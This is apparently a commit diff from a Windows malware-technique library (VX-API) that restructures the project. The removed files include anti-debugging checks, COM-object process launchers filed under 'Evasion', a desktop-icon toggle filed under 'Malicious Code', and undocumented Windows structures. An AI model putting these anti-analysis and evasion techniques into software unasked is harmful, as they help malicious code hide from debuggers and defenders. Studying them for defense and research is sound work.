update

.gitignore

@@ -0,0 +1,5 @@
+
+*.obj
+*.tlog
+x64/Debug/VX-API.exe
+*.pdb

Anti-Debug/AdfCloseHandleOnInvalidAddress.cpp

@@ -1,22 +0,0 @@
-/*
-If a process is running under a debugger and an invalid handle is passed to the ntdll!NtClose() or kernel32!CloseHandle() 
-function, then the EXCEPTION_INVALID_HANDLE (0xC0000008) exception will be raised. The exception can be cached by 
-an exception handler. If the control is passed to the exception handler, it indicates that a debugger is present.
-
-Credit: Checkpoint Research
-
-*/
-BOOL AdfCloseHandleOnInvalidAddress(VOID)
-{
-	__try
-	{
-		CloseHandle((HANDLE)0xDEADBEEF);
-		return FALSE;
-	}
-	__except (EXCEPTION_INVALID_HANDLE == GetExceptionCode() ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
-	{
-		return TRUE;
-	}
-	
-	return FALSE;
-}

Anti-Debug/AdfIsCreateProcessDebugEventCodeSet.cpp

@@ -1,31 +0,0 @@
-/*
-
-When the CREATE_PROCESS_DEBUG_EVENT event occurs, the handle of the debugged file is stored in 
-the CREATE_PROCESS_DEBUG_INFO structure. Therefore, debuggers can read the debug information 
-from this file. If this handle is not closed by the debugger, the file won’t be opened with 
-exclusive access. Some debuggers can forget to close the handle.
-
-This trick uses kernel32!CreateFileW() (or kernel32!CreateFileA()) to exclusively open the 
-file of the current process. If the call fails, we can consider that the current process is being 
-run in the presence of a debugger.
-
-Credit: Checkpoint Research
-*/
-
-BOOL AdfIsCreateProcessDebugEventCodeSet(VOID)
-{
-	WCHAR FilePath[MAX_PATH * sizeof(WCHAR)] = { 0 };
-	HANDLE hHandle = INVALID_HANDLE_VALUE;
-
-	if (GetInMemoryModulePathFromProcessParametersW((MAX_PATH * sizeof(WCHAR)), FilePath) == 0)
-		return FALSE;
-
-	hHandle = CreateFileW(FilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, 0);
-	if (hHandle == INVALID_HANDLE_VALUE)
-		return TRUE;
-
-	if (hHandle)
-		CloseHandle(hHandle);
-
-	return FALSE;
-}

Anti-Debug/RfIsDebuggerPresent.cpp

@@ -1,4 +0,0 @@
-BOOL RfIsDebuggerPresent(VOID)
-{
-	return GetPeb()->BeingDebugged;
-}

Evasion/CreateProcessFromIHxHelpPaneServerW.cpp

@@ -1,53 +0,0 @@
-/*
-Paper: Finding Interactive User COM Objects using PowerShell
-
-Credit: James Forshaw
-*/
-
-struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}"))
-	IHxHelpPaneServer : public IUnknown {
-	virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0;
-	virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0;
-	virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0;
-	virtual HRESULT __stdcall Execute(const PWCHAR) = 0;
-};
-
-HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid)
-{
-	HRESULT Result = S_OK;
-
-	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
-		return Result;
-
-	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
-		return Result;
-
-	return Result;
-}
-
-HRESULT CreateProcessFromIHxHelpPaneServerW(PWCHAR UriFile)
-{
-	HRESULT Result = S_OK;
-	GUID CLSID_IHxHelpPaneServer;
-	GUID IID_IHxHelpPaneServer;
-
-	IHxHelpPaneServer* Help = NULL;
-
-	if (!SUCCEEDED(Result = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer)))
-		return EhWin32FromHResult(Result);
-
-	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
-		return EhWin32FromHResult(Result);
-
-	if (!SUCCEEDED(CoCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, IID_IHxHelpPaneServer, (PVOID*)&Help)))
-		return EhWin32FromHResult(Result);
-
-	Result = Help->Execute(UriFile);
-
-	if (Help)
-		Help->Release();
-
-	CoUninitialize();
-
-	return EhWin32FromHResult(Result);
-}

Evasion/CreateProcessFromIHxInteractiveUserW.cpp

@@ -1,49 +0,0 @@
-/*
-Paper: Finding Interactive User COM Objects using PowerShell
-
-Credit: James Forshaw
-*/
-
-struct __declspec(uuid("8cec595b-07a1-11d9-b15e-000d56bfe6ee"))
-	IHxInteractiveUser : public IUnknown {
-	virtual VOID __stdcall Execute(PWCHAR pcUrl) = 0;
-};
-
-HRESULT CoInitializeIHxInteractiveUserIds(LPGUID Clsid, LPGUID Iid)
-{
-	HRESULT Result = S_OK;
-
-	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58e7-07a1-11d9-b15e-000d56bfe6ee}", Clsid)))
-		return Result;
-
-	if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec595b-07a1-11d9-b15e-000d56bfe6ee}", Iid)))
-		return Result;
-
-	return Result;
-}
-
-HRESULT CreateProcessFromIHxInteractiveUserW(PWCHAR UriFile)
-{
-	HRESULT Result = S_OK;
-	GUID CLSID_IHxInteractiveUser;
-	GUID IID_IHxInteractiveUser;
-	IHxInteractiveUser* User = NULL;
-
-	if(!SUCCEEDED(Result = CoInitializeIHxInteractiveUserIds(&CLSID_IHxInteractiveUser, &IID_IHxInteractiveUser)))
-		return EhWin32FromHResult(Result);
-
-	if (!SUCCEEDED(Result = CoInitializeEx(NULL, COINIT_MULTITHREADED)))
-		return EhWin32FromHResult(Result);
-
-	if (!SUCCEEDED(Result = CoCreateInstance(CLSID_IHxInteractiveUser, NULL, CLSCTX_ALL, IID_IHxInteractiveUser, (PVOID*)&User)))
-		return EhWin32FromHResult(Result);
-
-	User->Execute(UriFile);
-
-	if (User)
-		User->Release();
-
-	CoUninitialize();
-
-	return EhWin32FromHResult(Result);
-}

Malicious Code/MpfComHideDesktopIconsToggle.cpp

@@ -1,117 +0,0 @@
-/*
-If the desktop icons are visible, makes them invisible
-If the desktop icons are invisible, makes them visible
-*/
-
-DWORD UnusedSubroutineInterfaceQueryDesktopView(REFIID Riid, PVOID* Pp)
-{
-	DWORD dwError = ERROR_SUCCESS;
-	HRESULT Result = S_OK;
-	IShellWindows* ShellWindows = NULL;
-	IShellBrowser* Browser = NULL;
-	IShellView* View = NULL;
-	CComVariant Desktop(CSIDL_DESKTOP); //initialize
-	CComVariant IDisposeObject;
-	IDispatch* Dispatch = NULL;
-	IServiceProvider* Provider = NULL;
-
-	Result = CoCreateInstance(CLSID_ShellWindows, NULL, CLSCTX_ALL, IID_IShellWindows, (VOID**)(&ShellWindows));
-	if (!SUCCEEDED(Result))
-		return EhWin32FromHResult(Result);
-
-	dwError = 0;
-	Result = ShellWindows->FindWindowSW(&Desktop, &IDisposeObject, SWC_DESKTOP, (PLONG)&dwError, SWFO_NEEDDISPATCH, &Dispatch);
-	if (!SUCCEEDED(Result))
-		goto FAILURE;
-	else
-		dwError = ERROR_SUCCESS;
-
-	Result = Dispatch->QueryInterface(IID_IServiceProvider, (VOID**)&Provider);
-	if (!SUCCEEDED(Result))
-		goto FAILURE;
-
-	Result = Provider->QueryService(SID_STopLevelBrowser, IID_PPV_ARGS(&Browser));
-	if (!SUCCEEDED(Result))
-		goto FAILURE;
-
-	Result = Browser->QueryActiveShellView(&View);
-	if (!SUCCEEDED(Result))
-		goto FAILURE;
-
-	Result = View->QueryInterface(Riid, Pp);
-	if (!SUCCEEDED(Result))
-		goto FAILURE;
-
-	if (Provider)
-		Provider->Release();
-
-	if (Browser)
-		Browser->Release();
-
-	if (View)
-		View->Release();
-
-	if (ShellWindows)
-		ShellWindows->Release();
-
-	return ERROR_SUCCESS;
-
-FAILURE:
-
-	dwError = EhWin32FromHResult(Result);
-
-	if (Provider)
-		Provider->Release();
-
-	if (Browser)
-		Browser->Release();
-
-	if (View)
-		View->Release();
-
-	if (ShellWindows)
-		ShellWindows->Release();
-
-	return dwError;
-}
-
-BOOL MpfComHideDesktopIconsToggle(VOID)
-{
-	DWORD dwError = ERROR_SUCCESS;
-	HRESULT Result = S_OK;
-	IFolderView2* FolderView2 = NULL;
-
-	if (CoInitialize(NULL) != S_OK)
-		goto EXIT_ROUTINE;
-
-	dwError = UnusedSubroutineInterfaceQueryDesktopView(IID_PPV_ARGS(&FolderView2));
-	if (dwError != ERROR_SUCCESS)
-		goto EXIT_ROUTINE;
-
-	dwError = 0;
-	Result = FolderView2->GetCurrentFolderFlags(&dwError);
-	if (!SUCCEEDED(Result))
-		goto EXIT_ROUTINE;
-
-	Result = FolderView2->SetCurrentFolderFlags(FWF_NOICONS, dwError ^ FWF_NOICONS);
-	if (!SUCCEEDED(Result))
-		goto EXIT_ROUTINE;
-
-	if (FolderView2)
-		FolderView2->Release();
-
-	CoUninitialize();
-
-	return ERROR_SUCCESS;
-
-EXIT_ROUTINE:
-
-	dwError = EhWin32FromHResult(Result);
-
-	if (FolderView2)
-		FolderView2->Release();
-
-	CoUninitialize();
-
-	return dwError;
-}

String Manipulation/String Conversion/DecimalToAscii.cpp

@@ -1,23 +0,0 @@
-DWORD DecimalToAsciiA(PCHAR String, LPDWORD dwArray, DWORD dwLength)
-{
-	DWORD dwX = ERROR_SUCCESS;
-
-	if (String == NULL)
-		return dwX;
-
-	for (; dwX < dwLength; dwX++) { String[dwX] = (CHAR)dwArray[dwX]; }
-
-	return dwX;
-}
-
-DWORD DecimalToAsciiW(PWCHAR String, LPDWORD dwArray, DWORD dwLength)
-{
-	DWORD dwX = ERROR_SUCCESS;
-
-	if (String == NULL)
-		return dwX;
-
-	for (; dwX < dwLength; dwX++) { String[dwX] = (WCHAR)dwArray[dwX]; }
-
-	return dwX;
-}

Structures/ACTIVATION_CONTEXT_STACK.h

@@ -1,7 +0,0 @@
-typedef struct _ACTIVATION_CONTEXT_STACK {
-	PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
-	LIST_ENTRY FrameListCache;
-	ULONG Flags;
-	ULONG NextCookieSequenceNumber;
-	ULONG StackId;
-} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;

Structures/ANSI_STRING.h

@@ -1,5 +0,0 @@
-typedef struct _STRING {
-	USHORT Length;
-	USHORT MaximumLength;
-	PCHAR  Buffer;
-} ANSI_STRING, * PANSI_STRING;

Structures/CLIENT_ID.h

@@ -1,4 +0,0 @@
-typedef struct __CLIENT_ID {
-	HANDLE UniqueProcess;
-	HANDLE UniqueThread;
-}CLIENT_ID, * PCLIENT_ID;

Structures/CURDIR.h

@@ -1,4 +0,0 @@
-typedef struct _CURDIR {
-	UNICODE_STRING DosPath;
-	PVOID Handle;
-}CURDIR, * PCURDIR;

Structures/GDI_TEB_BATCH.h

@@ -1,5 +0,0 @@
-typedef struct _GDI_TEB_BATCH {
-	ULONG Offset;
-	ULONG HDC;
-	ULONG Buffer[310];
-} GDI_TEB_BATCH, * PGDI_TEB_BATCH;

Structures/KSYSTEM_TIME.h

@@ -1,6 +0,0 @@
-typedef struct _KSYSTEM_TIME
-{
-	ULONG LowPart;
-	LONG High1Time;
-	LONG High2Time;
-} KSYSTEM_TIME, * PKSYSTEM_TIME;

Structures/KUSER_SHARED_DATA.h

@@ -1,118 +0,0 @@
-typedef struct _KUSER_SHARED_DATA {
-	ULONG                         TickCountLowDeprecated;
-	ULONG                         TickCountMultiplier;
-	KSYSTEM_TIME                  InterruptTime;
-	KSYSTEM_TIME                  SystemTime;
-	KSYSTEM_TIME                  TimeZoneBias;
-	USHORT                        ImageNumberLow;
-	USHORT                        ImageNumberHigh;
-	WCHAR                         NtSystemRoot[260];
-	ULONG                         MaxStackTraceDepth;
-	ULONG                         CryptoExponent;
-	ULONG                         TimeZoneId;
-	ULONG                         LargePageMinimum;
-	ULONG                         AitSamplingValue;
-	ULONG                         AppCompatFlag;
-	ULONGLONG                     RNGSeedVersion;
-	ULONG                         GlobalValidationRunlevel;
-	LONG                          TimeZoneBiasStamp;
-	ULONG                         NtBuildNumber;
-	NT_PRODUCT_TYPE               NtProductType;
-	BOOLEAN                       ProductTypeIsValid;
-	BOOLEAN                       Reserved0[1];
-	USHORT                        NativeProcessorArchitecture;
-	ULONG                         NtMajorVersion;
-	ULONG                         NtMinorVersion;
-	BOOLEAN                       ProcessorFeatures[PROCESSOR_FEATURE_MAX];
-	ULONG                         Reserved1;
-	ULONG                         Reserved3;
-	ULONG                         TimeSlip;
-	ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
-	ULONG                         BootId;
-	LARGE_INTEGER                 SystemExpirationDate;
-	ULONG                         SuiteMask;
-	BOOLEAN                       KdDebuggerEnabled;
-	union {
-		UCHAR MitigationPolicies;
-		struct {
-			UCHAR NXSupportPolicy : 2;
-			UCHAR SEHValidationPolicy : 2;
-			UCHAR CurDirDevicesSkippedForDlls : 2;
-			UCHAR Reserved : 2;
-		};
-	};
-	USHORT                        CyclesPerYield;
-	ULONG                         ActiveConsoleId;
-	ULONG                         DismountCount;
-	ULONG                         ComPlusPackage;
-	ULONG                         LastSystemRITEventTickCount;
-	ULONG                         NumberOfPhysicalPages;
-	BOOLEAN                       SafeBootMode;
-	UCHAR                         VirtualizationFlags;
-	UCHAR                         Reserved12[2];
-	union {
-		ULONG SharedDataFlags;
-		struct {
-			ULONG DbgErrorPortPresent : 1;
-			ULONG DbgElevationEnabled : 1;
-			ULONG DbgVirtEnabled : 1;
-			ULONG DbgInstallerDetectEnabled : 1;
-			ULONG DbgLkgEnabled : 1;
-			ULONG DbgDynProcessorEnabled : 1;
-			ULONG DbgConsoleBrokerEnabled : 1;
-			ULONG DbgSecureBootEnabled : 1;
-			ULONG DbgMultiSessionSku : 1;
-			ULONG DbgMultiUsersInSessionSku : 1;
-			ULONG DbgStateSeparationEnabled : 1;
-			ULONG SpareBits : 21;
-		} DUMMYSTRUCTNAME2;
-	} DUMMYUNIONNAME2;
-	ULONG                         DataFlagsPad[1];
-	ULONGLONG                     TestRetInstruction;
-	LONGLONG                      QpcFrequency;
-	ULONG                         SystemCall;
-	ULONG                         Reserved2;
-	ULONGLONG                     SystemCallPad[2];
-	union {
-		KSYSTEM_TIME TickCount;
-		ULONG64      TickCountQuad;
-		struct {
-			ULONG ReservedTickCountOverlay[3];
-			ULONG TickCountPad[1];
-		} DUMMYSTRUCTNAME;
-	} DUMMYUNIONNAME3;
-	ULONG                         Cookie;
-	ULONG                         CookiePad[1];
-	LONGLONG                      ConsoleSessionForegroundProcessId;
-	ULONGLONG                     TimeUpdateLock;
-	ULONGLONG                     BaselineSystemTimeQpc;
-	ULONGLONG                     BaselineInterruptTimeQpc;
-	ULONGLONG                     QpcSystemTimeIncrement;
-	ULONGLONG                     QpcInterruptTimeIncrement;
-	UCHAR                         QpcSystemTimeIncrementShift;
-	UCHAR                         QpcInterruptTimeIncrementShift;
-	USHORT                        UnparkedProcessorCount;
-	ULONG                         EnclaveFeatureMask[4];
-	ULONG                         TelemetryCoverageRound;
-	USHORT                        UserModeGlobalLogger[16];
-	ULONG                         ImageFileExecutionOptions;
-	ULONG                         LangGenerationCount;
-	ULONGLONG                     Reserved4;
-	ULONGLONG                     InterruptTimeBias;
-	ULONGLONG                     QpcBias;
-	ULONG                         ActiveProcessorCount;
-	UCHAR                         ActiveGroupCount;
-	UCHAR                         Reserved9;
-	union {
-		USHORT QpcData;
-		struct {
-			UCHAR QpcBypassEnabled;
-			UCHAR QpcShift;
-		};
-	};
-	LARGE_INTEGER                 TimeZoneBiasEffectiveStart;
-	LARGE_INTEGER                 TimeZoneBiasEffectiveEnd;
-	XSTATE_CONFIGURATION          XState;
-	KSYSTEM_TIME                  FeatureConfigurationChangeStamp;
-	ULONG                         Spare;
-} KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;

Structures/LDR_MODULE.h

@@ -1,15 +0,0 @@
-typedef struct _LDR_MODULE {
-	LIST_ENTRY              InLoadOrderModuleList;
-	LIST_ENTRY              InMemoryOrderModuleList;
-	LIST_ENTRY              InInitializationOrderModuleList;
-	PVOID                   BaseAddress;
-	PVOID                   EntryPoint;
-	ULONG                   SizeOfImage;
-	UNICODE_STRING          FullDllName;
-	UNICODE_STRING          BaseDllName;
-	ULONG                   Flags;
-	SHORT                   LoadCount;
-	SHORT                   TlsIndex;
-	LIST_ENTRY              HashTableEntry;
-	ULONG                   TimeDateStamp;
-} LDR_MODULE, * PLDR_MODULE;

Structures/PEB.h

@@ -1,56 +0,0 @@
-typedef struct _PEB {
-	BOOLEAN                 InheritedAddressSpace;
-	BOOLEAN                 ReadImageFileExecOptions;
-	BOOLEAN                 BeingDebugged;
-	BOOLEAN                 Spare;
-	HANDLE                  Mutant;
-	PVOID                   ImageBase;
-	PPEB_LDR_DATA           LoaderData;
-	PRTL_USER_PROCESS_PARAMETERS                   ProcessParameters;
-	PVOID                   SubSystemData;
-	PVOID                   ProcessHeap;
-	PVOID                   FastPebLock;
-	PVOID                   FastPebLockRoutine;
-	PVOID                   FastPebUnlockRoutine;
-	ULONG                   EnvironmentUpdateCount;
-	PVOID*                  KernelCallbackTable;
-	PVOID                   EventLogSection;
-	PVOID                   EventLog;
-	PVOID                   FreeList;
-	ULONG                   TlsExpansionCounter;
-	PVOID                   TlsBitmap;
-	ULONG                   TlsBitmapBits[0x2];
-	PVOID                   ReadOnlySharedMemoryBase;
-	PVOID                   ReadOnlySharedMemoryHeap;
-	PVOID*                  ReadOnlyStaticServerData;
-	PVOID                   AnsiCodePageData;
-	PVOID                   OemCodePageData;
-	PVOID                   UnicodeCaseTableData;
-	ULONG                   NumberOfProcessors;
-	ULONG                   NtGlobalFlag;
-	BYTE                    Spare2[0x4];
-	LARGE_INTEGER           CriticalSectionTimeout;
-	ULONG                   HeapSegmentReserve;
-	ULONG                   HeapSegmentCommit;
-	ULONG                   HeapDeCommitTotalFreeThreshold;
-	ULONG                   HeapDeCommitFreeBlockThreshold;
-	ULONG                   NumberOfHeaps;
-	ULONG                   MaximumNumberOfHeaps;
-	PVOID**                 ProcessHeaps;
-	PVOID                   GdiSharedHandleTable;
-	PVOID                   ProcessStarterHelper;
-	PVOID                   GdiDCAttributeList;
-	PVOID                   LoaderLock;
-	ULONG                   OSMajorVersion;
-	ULONG                   OSMinorVersion;
-	ULONG                   OSBuildNumber;
-	ULONG                   OSPlatformId;
-	ULONG                   ImageSubSystem;
-	ULONG                   ImageSubSystemMajorVersion;
-	ULONG                   ImageSubSystemMinorVersion;
-	ULONG                   GdiHandleBuffer[0x22];
-	ULONG                   PostProcessInitRoutine;
-	ULONG                   TlsExpansionBitmap;
-	BYTE                    TlsExpansionBitmapBits[0x80];
-	ULONG                   SessionId;
-} PEB, * PPEB;

Structures/PEB_LDR_DATA.h

@@ -1,8 +0,0 @@
-typedef struct _PEB_LDR_DATA {
-	ULONG                   Length;
-	ULONG                   Initialized;
-	PVOID                   SsHandle;
-	LIST_ENTRY              InLoadOrderModuleList;
-	LIST_ENTRY              InMemoryOrderModuleList;
-	LIST_ENTRY              InInitializationOrderModuleList;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;

Structures/RTL_ACTIVATION_CONTEXT_STACK_FRAME.h

@@ -1,7 +0,0 @@
-typedef PVOID PACTIVATION_CONTEXT;
-
-typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
-	struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
-	PACTIVATION_CONTEXT ActivationContext;
-	ULONG Flags;
-} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;

Structures/RTL_DRIVE_LETTER_CURDIR.h

@@ -1,6 +0,0 @@
-typedef struct _RTL_DRIVE_LETTER_CURDIR {
-	WORD Flags;
-	WORD Length;
-	ULONG TimeStamp;
-	ANSI_STRING DosPath;
-} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;

Structures/RTL_USER_PROCESS_PARAMETERS.h

@@ -1,31 +0,0 @@
-typedef struct _RTL_USER_PROCESS_PARAMETERS {
-	ULONG MaximumLength;
-	ULONG Length;
-	ULONG Flags;
-	ULONG DebugFlags;
-	PVOID ConsoleHandle;
-	ULONG ConsoleFlags;
-	PVOID StandardInput;
-	PVOID StandardOutput;
-	PVOID StandardError;
-	CURDIR CurrentDirectory;
-	UNICODE_STRING DllPath;
-	UNICODE_STRING ImagePathName;
-	UNICODE_STRING CommandLine;
-	PVOID Environment;
-	ULONG StartingX;
-	ULONG StartingY;
-	ULONG CountX;
-	ULONG CountY;
-	ULONG CountCharsX;
-	ULONG CountCharsY;
-	ULONG FillAttribute;
-	ULONG WindowFlags;
-	ULONG ShowWindowFlags;
-	UNICODE_STRING WindowTitle;
-	UNICODE_STRING DesktopInfo;
-	UNICODE_STRING ShellInfo;
-	UNICODE_STRING RuntimeData;
-	RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
-	ULONG EnvironmentSize;
-}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;

Structures/TEB.h

@@ -1,159 +0,0 @@
-typedef struct _TEB
-{
-	NT_TIB				NtTib;
-	PVOID				EnvironmentPointer;
-	CLIENT_ID			ClientId;
-	PVOID				ActiveRpcHandle;
-	PVOID				ThreadLocalStoragePointer;
-	PPEB				ProcessEnvironmentBlock;
-	ULONG               LastErrorValue;
-	ULONG               CountOfOwnedCriticalSections;
-	PVOID				CsrClientThread;
-	PVOID				Win32ThreadInfo;
-	ULONG               User32Reserved[26];
-	ULONG               UserReserved[5];
-	PVOID				WOW32Reserved;
-	LCID                CurrentLocale;
-	ULONG               FpSoftwareStatusRegister;
-	PVOID				SystemReserved1[54];
-	LONG                ExceptionCode;
-#if (NTDDI_VERSION >= NTDDI_LONGHORN)
-	PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
-	UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
-	ULONG                  TxFsContext;
-#elif (NTDDI_VERSION >= NTDDI_WS03)
-	PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
-	UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
-#else
-	ACTIVATION_CONTEXT_STACK ActivationContextStack;
-	UCHAR                  SpareBytes1[24];
-#endif
-	GDI_TEB_BATCH			GdiTebBatch;
-	CLIENT_ID				RealClientId;
-	PVOID					GdiCachedProcessHandle;
-	ULONG                   GdiClientPID;
-	ULONG                   GdiClientTID;
-	PVOID					GdiThreadLocalInfo;
-	PSIZE_T					Win32ClientInfo[62];
-	PVOID					glDispatchTable[233];
-	PSIZE_T					glReserved1[29];
-	PVOID					glReserved2;
-	PVOID					glSectionInfo;
-	PVOID					glSection;
-	PVOID					glTable;
-	PVOID					glCurrentRC;
-	PVOID					glContext;
-	NTSTATUS                LastStatusValue;
-	UNICODE_STRING			StaticUnicodeString;
-	WCHAR                   StaticUnicodeBuffer[261];
-	PVOID					DeallocationStack;
-	PVOID					TlsSlots[64];
-	LIST_ENTRY				TlsLinks;
-	PVOID					Vdm;
-	PVOID					ReservedForNtRpc;
-	PVOID					DbgSsReserved[2];
-#if (NTDDI_VERSION >= NTDDI_WS03)
-	ULONG                   HardErrorMode;
-#else
-	ULONG                  HardErrorsAreDisabled;
-#endif
-#if (NTDDI_VERSION >= NTDDI_LONGHORN)
-	PVOID					Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
-	GUID                    ActivityId;
-	PVOID					SubProcessTag;
-	PVOID					EtwLocalData;
-	PVOID					EtwTraceData;
-#elif (NTDDI_VERSION >= NTDDI_WS03)
-	PVOID					Instrumentation[14];
-	PVOID					SubProcessTag;
-	PVOID					EtwLocalData;
-#else
-	PVOID					Instrumentation[16];
-#endif
-	PVOID					WinSockData;
-	ULONG					GdiBatchCount;
-#if (NTDDI_VERSION >= NTDDI_LONGHORN)
-	BOOLEAN                SpareBool0;
-	BOOLEAN                SpareBool1;
-	BOOLEAN                SpareBool2;
-#else
-	BOOLEAN                InDbgPrint;
-	BOOLEAN                FreeStackOnTermination;
-	BOOLEAN                HasFiberData;
-#endif
-	UCHAR                  IdealProcessor;
-#if (NTDDI_VERSION >= NTDDI_WS03)
-	ULONG                  GuaranteedStackBytes;
-#else
-	ULONG                  Spare3;
-#endif
-	PVOID				   ReservedForPerf;
-	PVOID				   ReservedForOle;
-	ULONG                  WaitingOnLoaderLock;
-#if (NTDDI_VERSION >= NTDDI_LONGHORN)
-	PVOID				   SavedPriorityState;
-	ULONG_PTR			   SoftPatchPtr1;
-	ULONG_PTR			   ThreadPoolData;
-#elif (NTDDI_VERSION >= NTDDI_WS03)
-	ULONG_PTR			   SparePointer1;
-	ULONG_PTR              SoftPatchPtr1;
-	ULONG_PTR              SoftPatchPtr2;
-#else
-	Wx86ThreadState        Wx86Thread;
-#endif
-	PVOID* TlsExpansionSlots;
-#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
-	PVOID                  DeallocationBStore;
-	PVOID                  BStoreLimit;
-#endif
-	ULONG                  ImpersonationLocale;
-	ULONG                  IsImpersonating;
-	PVOID                  NlsCache;
-	PVOID                  pShimData;
-	ULONG                  HeapVirtualAffinity;
-	HANDLE                 CurrentTransactionHandle;
-	PTEB_ACTIVE_FRAME      ActiveFrame;
-#if (NTDDI_VERSION >= NTDDI_WS03)
-	PVOID FlsData;
-#endif
-#if (NTDDI_VERSION >= NTDDI_LONGHORN)
-	PVOID PreferredLangauges;
-	PVOID UserPrefLanguages;
-	PVOID MergedPrefLanguages;
-	ULONG MuiImpersonation;
-	union
-	{
-		struct
-		{
-			USHORT SpareCrossTebFlags : 16;
-		};
-		USHORT CrossTebFlags;
-	};
-	union
-	{
-		struct
-		{
-			USHORT DbgSafeThunkCall : 1;
-			USHORT DbgInDebugPrint : 1;
-			USHORT DbgHasFiberData : 1;
-			USHORT DbgSkipThreadAttach : 1;
-			USHORT DbgWerInShipAssertCode : 1;
-			USHORT DbgIssuedInitialBp : 1;
-			USHORT DbgClonedThread : 1;
-			USHORT SpareSameTebBits : 9;
-		};
-		USHORT SameTebFlags;
-	};
-	PVOID TxnScopeEntercallback;
-	PVOID TxnScopeExitCAllback;
-	PVOID TxnScopeContext;
-	ULONG LockCount;
-	ULONG ProcessRundown;
-	ULONG64 LastSwitchTime;
-	ULONG64 TotalSwitchOutTime;
-	LARGE_INTEGER WaitReasonBitMap;
-#else
-	BOOLEAN SafeThunkCall;
-	BOOLEAN BooleanSpare[3];
-#endif
-} TEB, * PTEB;

Structures/TEB_ACTIVE_FRAME.h

@@ -1,5 +0,0 @@
-typedef struct _TEB_ACTIVE_FRAME {
-	ULONG Flags;
-	struct _TEB_ACTIVE_FRAME* Previous;
-	PTEB_ACTIVE_FRAME_CONTEXT Context;
-} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;

Structures/TEB_ACTIVE_FRAME_CONTEXT.h

@@ -1,4 +0,0 @@
-typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
-	ULONG Flags;
-	PCHAR FrameName;
-} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;

Structures/UNICODE_STRING.h

@@ -1,5 +0,0 @@
-typedef struct _LSA_UNICODE_STRING {
-	USHORT Length;
-	USHORT MaximumLength;
-	PWSTR  Buffer;
-} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;

VX-API.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.3.32811.315
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.ActiveCfg = Debug|x64
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x64.Build.0 = Debug|x64
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.ActiveCfg = Debug|Win32
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Debug|x86.Build.0 = Debug|Win32
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.ActiveCfg = Release|x64
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
+		{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {1F480641-9B52-43C6-8598-B49F6B203C27}
+	EndGlobalSection
+EndGlobal

VX-API/AdfCloseHandleOnInvalidAddress.cpp

@@ -0,0 +1,19 @@
+#include "Win32Helper.h"
+
+BOOL AdfCloseHandleOnInvalidAddress(VOID)
+{
+	__try
+	{
+#pragma warning( push )
+#pragma warning( disable : 4312)
+		CloseHandle((HANDLE)0xDEADBEEF);
+#pragma warning( pop ) 
+		return FALSE;
+	}
